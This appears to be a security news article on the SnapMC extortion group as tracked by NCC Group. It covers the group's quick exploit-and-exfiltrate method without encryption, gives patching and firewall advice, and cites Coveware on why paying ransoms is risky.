A new followed player like SnapMC has emerged in the cybercrime space, performing the typical data extortion that underlies ransomware operations, but without doing the file encryption part.
File encryption is considered an essential component of ransomware attacks because it is the very element that disrupts the victim’s operations.
Data exfiltration for double extortion later came as an additional form of leverage against a victim, but always took precedence over the chaos caused by an encrypted network
Soon, ransomware players realized the power of this approach, as many companies could restore corrupted files from backups, but could not undo the file theft event and its consequences.
NCC Group researchers have tracked a new adversary they call SnapMC, named after the group’s rapid strike approach, which goes into networks, steals files and sends extortion emails less 30 minutes.
Target known vulnerabilities
The SnapMC gang uses the Acunetix vulnerability scanner to find a series of flaws in a target’s VPN and web server applications, then successfully exploit them to breach the corporate network.
The most exploited flaws observed in the actor’s initial access efforts include PrintNightmare LPE, remote code execution in the Telerik UI for ASPX.NET, as well as various SQL injection opportunities.
Actors use SQL database export scripts to steal data, while CSV files are compressed with 7zip archive utility before exfiltration. Once everything is carefully packed, the MinIO client is used to send the data back to the attacker.
Since SnapMC exploits known vulnerabilities that have already been patched, updating your software tools would be a good way to defend against this growing threat.
As NCC Group points out in its report, even if an organization is using a vulnerable version of Telerik, placing it behind a well-configured web application firewall would make any exploitation effort futile.
Paying is risky
In data exfiltration extortion attacks, meeting the threat actor’s demands by paying for ransomware is no guarantee. On the contrary, it could encourage hackers to attempt further extortions in the future.
It is also possible that even if a victim pays a ransom, their data ends up being sold in criminal markets or hacker forums, which is another way to generate income for the attackers.
Ransomware brokerage firm Coveware strongly advises its customers to never pay ransom to prevent stolen files from being disclosed to the public.
In the past, during negotiations, victims have paid a ransom and their data has always been disclosed or no evidence of deletion has been provided.
- Sodinokibi: The victims who paid were rextorted weeks later with threats to release the same data set.
- Netwalker: published data of companies that paid not to be disclosed
- Mespinoza: data released on companies that paid not to be disclosed
- Conti: fake files are displayed as proof of deletion
For this reason, victims should automatically assume that their data has been shared with other threat actors and will be used or disclosed in the future, regardless of whether or not they have paid a ransom.
- RansomEXX ransomware Linux encryption may damage victims’ files
- OpenSea NFT platform bugs allow hackers to steal crypto wallets
- OpenSea NFT platform bugs allow hackers to steal crypto wallets?
- Microsoft Exchange ProxyToken Bug May Allow Hackers to Steal Users’ Email
- Hackers Steal Thousands of Coinbase Customers Using MFA Flaw